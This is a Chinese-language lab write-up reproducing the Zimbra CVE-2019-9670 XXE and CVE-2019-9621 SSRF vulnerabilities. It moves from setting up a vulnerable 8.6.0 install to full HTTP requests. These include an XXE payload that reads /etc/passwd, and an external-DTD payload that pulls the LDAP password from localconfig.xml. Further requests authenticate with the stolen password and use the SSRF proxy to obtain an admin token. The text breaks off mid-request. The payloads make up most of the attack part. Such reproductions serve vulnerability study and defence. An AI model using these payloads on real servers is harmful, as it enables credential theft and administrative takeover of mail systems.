Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现

参考

zimbra RCE环境搭建到复现再到exp编写
https://xz.aliyun.com/t/7991#toc-5

zimbra RCE 漏洞利用
https://cloud.tencent.com/developer/article/1752450
1
2
3
4
5

环境搭建

安装依赖

ubuntu ip addr: 192.168.8.129

apt-get install libgmp10 libperl5.18 unzip pax sysstat sqlite3 dnsmasq wget

ubuntu环境需要为14，其他版本可能安装libperl5.18会报错，后续可能也会有一大堆问题，所以还是用14比较好
1
2
3
4
5

配置hostname和dns服务器

vim /etc/hostname

mail.test.com
1
2
3

vim /etc/hosts

192.168.8.129	mail.test.com	mail
1
2
3

vim /etc/dnsmasq.conf

server=192.168.8.130
domain=test.com
mx-host=test.com, mail.test.com, 5
mx-host=mail.test.com, mail.test.com, 5
listen-address=127.0.0.1
1
2
3
4
5
6
7

下载有漏洞版本的zimbra，解压，进入解压后的目录进行安装

wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz

tar xvf zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz
cd zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116
sudo ./install.sh

安装时注意观察返回结果，可能会报错缺少依赖信息，按缺少的依赖补充安装即可
一些缺少的依赖可以直接用apt-get安装，对于缺少libgmp3c2，参考文章中的链接已失效，可以采用以下链接安装

wget http://launchpadlibrarian.net/70575439/libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb
sudo dpkg -i libgmp3c2_4.3.2+dfsg-2ubuntu1_amd64.deb
1
2
3
4
5
6
7
8
9
10
11

安装配置zimbra

复现时使用的是dnsmasq，所以除了zimbra-dnscache选择 n ，其他默认 y 即可。
之后会进入Main menu界面，选择 6 配置 zimbra-store，选择 4 设置管理员密码，之后输入 a 应用配置，之后默认yes，最后保存更新系统设置yes即可

安装完成后，访问登陆界面即可
https://192.168.8.129:7071/zimbraAdmin
1
2
3
4
5

CVE-2019-9670 XXE

漏洞路由

https://192.168.8.130:7071/Autodiscover/Autodiscover.xml
1

使用burpsuite或者其他接口测试工具以post方式发送一个空标签，Content-Type设置为application/xml，界面返回400解析错误，可能存在xxe

构造XML Poc验证是否存在XXE漏洞

<!DOCTYPE asd [
<!ELEMENT name ANY >
<!ENTITY asd SYSTEM "file:///etc/passwd" >]>
 <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
      <EMailAddress>asdasd@ad.com</EMailAddress>
      <AcceptableResponseSchema>&asd;</AcceptableResponseSchema>
    </Request>
  </Autodiscover>
1
2
3
4
5
6
7
8
9

页面503，返回了读取的文件信息，存在XXE

利用xxe获取localconfig.xml 中的用户名和密码，由于localconfig.xml为XML文件，需要加上CDATA标签才能作为文本读取，由于XXE不能内部实体进行拼接，所以此处需要使用外部dtd，payload构造如下：

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
1
2
3
4

启动远程服务，发送如下payload，利用xxe读取默认用户zimbra的密码，密码字段在zimbra_ldap_password

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 400
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://192.168.8.129:99/1.txt">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

成功读取到密码

CVE-2019-9621 SSRF

利用前面的xxe漏洞读取到的账号密码，获取一个低权限token

POST /service/soap HTTP/1.1
Host: 192.168.8.130
Content-Length: 463
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>lDsiZPjl</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

这里是向客户端登陆处/service/soap发送，也可以向管理员登陆处7071端口/service/admin/soap发送payload直接获取高权限token，注意下改端口以及将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

将获取到的低权限token设置到cookie中，探测是否存在ssrf，注意，修改cookie时如果401错误，将cookie字段ZM_AUTH_TOKEN改为ZM_ADMIN_AUTH_TOKEN即可

POST /service/proxy?target=https://abcd.0lzme4.dnslog.cn HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 0
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


1
2
3
4
5
6
7
8
9
10
11
12

ssrf可利用后，结合低权限token获取一个高权限token，将<AuthRequest xmlns="urn:zimbraAccount">改为<AuthRequest xmlns="urn:zimbraAdmin">

POST /service/proxy?target=https://192.168.8.130:7071/service/admin/soap HTTP/1.1
Host: 192.168.8.130:7071
Content-Length: 461
Cookie: ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.63
Content-Type: application/soap+xml; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           
1
2
3
4
5
6
7
8
9
10
11
12
13
14